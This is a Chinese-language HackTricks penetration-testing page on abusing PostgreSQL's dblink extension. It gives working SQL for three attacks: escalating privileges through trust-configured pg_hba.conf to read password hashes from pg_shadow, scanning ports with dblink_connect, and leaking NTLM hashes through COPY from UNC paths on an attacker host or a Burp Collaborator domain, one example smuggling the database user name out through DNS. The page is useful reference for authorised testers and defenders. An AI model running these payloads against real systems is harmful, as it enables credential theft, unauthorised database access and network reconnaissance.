网络 - 权限提升、端口扫描和 NTLM 挑战响应泄露

Reading time: 5 minutes

tip

学习和实践 AWS 黑客技术：HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术：HackTricks Training GCP Red Team Expert (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或在 Twitter 🐦 上关注我们 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。

查找 有关这些攻击的更多信息，请参阅原始论文。

自 PostgreSQL 9.1 以来，安装额外模块变得简单。注册扩展如 dblink 可以通过 CREATE EXTENSION 安装：

sql

CREATE EXTENSION dblink;

一旦加载了 dblink，您可以执行一些有趣的技巧：

权限提升

文件 pg_hba.conf 可能配置不当 允许来自 localhost 的连接 作为 任何用户，而无需知道密码。该文件通常可以在 /etc/postgresql/12/main/pg_hba.conf 中找到，错误的配置如下：

local    all    all    trust

请注意，这种配置通常用于在管理员忘记数据库用户密码时修改密码，因此有时您可能会找到它。
还请注意，pg_hba.conf 文件仅可由 postgres 用户和组读取，仅可由 postgres 用户写入。

这种情况是 有用的，如果 你已经在受害者的 shell 中，因为它将允许你连接到 postgresql 数据库。

另一个可能的错误配置类似于：

host    all     all     127.0.0.1/32    trust

因为它将允许来自本地主机的每个人以任何用户身份连接到数据库。
在这种情况下，如果 dblink 函数 正常工作，您可以通过连接到已经建立的连接来 提升权限，并访问不应该能够访问的数据：

sql

SELECT * FROM dblink('host=127.0.0.1
user=postgres
dbname=postgres',
'SELECT datname FROM pg_database')
RETURNS (result TEXT);

SELECT * FROM dblink('host=127.0.0.1
user=postgres
dbname=postgres',
'select usename, passwd from pg_shadow')
RETURNS (result1 TEXT, result2 TEXT);

端口扫描

滥用 dblink_connect 你也可以 搜索开放端口。如果该函数不起作用，你应该尝试使用 dblink_connect_u()，因为文档说 dblink_connect_u() 与 dblink_connect() 是相同的，除了它允许非超级用户使用任何认证方法连接。

sql

SELECT * FROM dblink_connect('host=216.58.212.238
port=443
user=name
password=secret
dbname=abc
connect_timeout=10');
//Different response
// Port closed
RROR:  could not establish connection
DETAIL:  could not connect to server: Connection refused
Is the server running on host "127.0.0.1" and accepting
TCP/IP connections on port 4444?

// Port Filtered/Timeout
ERROR:  could not establish connection
DETAIL:  timeout expired

// Accessing HTTP server
ERROR:  could not establish connection
DETAIL:  timeout expired

// Accessing HTTPS server
ERROR:  could not establish connection
DETAIL:  received invalid response to SSL negotiation:

请注意，在能够使用 dblink_connect 或 dblink_connect_u 之前，您可能需要执行：

CREATE extension dblink;

UNC 路径 - NTLM 哈希泄露

sql

-- can be used to leak hashes to Responder/equivalent
CREATE TABLE test();
COPY test FROM E'\\\\attacker-machine\\footestbar.txt';

sql

-- to extract the value of user and send it to Burp Collaborator
CREATE TABLE test(retval text);
CREATE OR REPLACE FUNCTION testfunc() RETURNS VOID AS $$
DECLARE sqlstring TEXT;
DECLARE userval TEXT;
BEGIN
SELECT INTO userval (SELECT user);
sqlstring := E'COPY test(retval) FROM E\'\\\\\\\\'||userval||E'.xxxx.burpcollaborator.net\\\\test.txt\'';
EXECUTE sqlstring;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT testfunc();

tip

学习和实践 AWS 黑客技术：HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术：HackTricks Training GCP Red Team Expert (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或在 Twitter 🐦 上关注我们 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。